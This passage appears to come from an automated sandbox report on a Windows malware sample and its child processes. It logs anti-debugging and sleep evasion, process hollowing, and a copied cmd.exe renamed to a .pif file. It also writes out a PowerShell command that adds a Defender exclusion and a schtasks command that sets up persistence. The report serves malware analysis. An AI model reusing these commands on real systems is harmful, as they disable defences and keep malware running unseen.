Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97984s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97874s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97765s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97656s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97546s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97437s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97328s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97218s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -97000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96751s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96625s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96513s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96249s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96134s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -96031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95916s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95810s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95593s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95374s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95265s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95156s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -95046s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94937s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94828s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94701s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94593s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94484s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 Thread sleep time: -94374s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 2228 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8092 Thread sleep time: -562620000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8092 Thread sleep time: -24600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\xpha.pif Last function: Thread delayed
Source: C:\Windows\System32\alg.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02CF5908
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 7_2_00EF0207
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_00EF589A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose, 7_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 7_2_00EE532E
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 15_2_00EF589A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 15_2_00EF0207
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 15_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose, 15_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 15_2_00EE532E
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99872
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99714
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99589
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99449
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99172
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98887
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98664
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98534
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98299
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98156
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97922
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97796
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97527
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97274
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97150
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96968
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96825
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96570
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96299
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95822
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95662
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95499
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95388
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95189
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95047
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94910
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94785
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94641
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94529
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94371
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94242
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94117
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 93939
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 93715
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\alg.exe Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99890
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99765
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99655
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99543
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99437
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99328
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99218
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 99109
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98999
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98761
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98639
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98527
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98421
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98312
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98200
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 98093
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97984
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97874
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97765
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97656
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97546
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97437
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97328
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97218
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97109
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 97000
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96890
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96751
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96625
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96513
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96375
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96249
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96134
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 96031
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95916
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95810
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95703
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95593
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95484
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95374
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95265
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95156
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 95046
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94937
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94828
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94701
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94593
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94484
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Thread delayed: delay time: 94374
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Thread delayed: delay time: 60000
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: xpha.pif, 00000010.00000002.1566080519.0000000002D5B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: C6dAUcOA6M.exe, 00000000.00000002.1445092943.0000000000694000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1445092943.000000000063E000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.00000000007C9000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1667563278.000000000077A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1712292652.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2716618659.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2410341370.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1679864810.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1523809233.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2633471457.000000000066B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1532040197.000000000066B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02D0F744
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process queried: DebugPort
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process queried: DebugPort
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F02E37 IsDebuggerPresent, 7_2_00F02E37
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 13_2_004019F0
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02D0894C
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F0C1FA mov eax, dword ptr fs:[00000030h] 7_2_00F0C1FA
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00492B94 mov eax, dword ptr fs:[00000030h] 13_2_00492B94
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006C1130 mov eax, dword ptr fs:[00000030h] 13_2_006C1130
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00703F3D mov eax, dword ptr fs:[00000030h] 13_2_00703F3D
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F0C1FA mov eax, dword ptr fs:[00000030h] 15_2_00F0C1FA
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EEA9D4 GetEnvironmentStringsW,GetProcessHeap,RtlAllocateHeap,memcpy,FreeEnvironmentStringsW, 7_2_00EEA9D4
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Process token adjusted: Debug
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF6EC0 SetUnhandledExceptionFilter, 7_2_00EF6EC0
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00EF6B40
Source: C:\Users\Public\Libraries\aymtmquJ.pif Code function: 11_1_00401475 EntryPoint,memset,SetUnhandledExceptionFilter,__set_app_type,_controlfp,__argc,__argv,_environ,_environ,__argv,__getmainargs,__argc,__argv,_environ,__argc,__argc,exit, 11_1_00401475
Source: C:\Users\Public\Libraries\aymtmquJ.pif Code function: 11_1_004015D7 SetUnhandledExceptionFilter, 11_1_004015D7
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004123F1 SetUnhandledExceptionFilter, 13_2_004123F1
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00701361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 13_2_00701361
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_00704C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 13_2_00704C7B
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF6EC0 SetUnhandledExceptionFilter, 15_2_00EF6EC0
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF6B40 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 15_2_00EF6B40
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Memory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory allocated: C:\Users\Public\Libraries\aymtmquJ.pif base: 400000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Section unmapped: C:\Users\Public\Libraries\aymtmquJ.pif base address: 400000
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 36F008
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 391008
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Memory written: C:\Users\Public\Libraries\aymtmquJ.pif base: 20D008
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006E8550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW, 13_2_006E8550
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02CF5ACC
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: GetLocaleInfoA, 0_2_02CFA7C4
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 0_2_02CF5BD8
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: GetLocaleInfoA, 0_2_02CFA810
Source: C:\Users\Public\alpha.pif Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale, 7_2_00EE8572
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc, 7_2_00EE6854
Source: C:\Users\Public\alpha.pif Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW, 7_2_00EE9310
